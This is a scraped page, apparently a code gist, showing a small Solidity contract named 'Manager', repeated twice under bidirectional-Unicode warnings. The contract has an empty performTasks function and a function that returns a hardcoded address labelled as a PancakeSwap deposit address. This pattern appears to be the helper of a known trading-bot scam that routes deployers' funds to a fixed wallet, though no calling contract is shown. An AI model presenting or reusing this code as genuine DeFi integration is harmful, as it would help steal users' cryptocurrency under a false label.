This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
pragma solidity ^0.6.6; | |
contract Manager { | |
function performTasks() public { | |
} | |
function pancakeswapDepositAddress() public pure returns (address) { | |
return 0xDC31ed1f220C45D575b66E587e7BF2A4867E742D; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
pragma solidity ^0.6.6; | |
contract Manager { | |
function performTasks() public { | |
} | |
function pancakeswapDepositAddress() public pure returns (address) { | |
return 0xDC31ed1f220C45D575b66E587e7BF2A4867E742D; | |
} |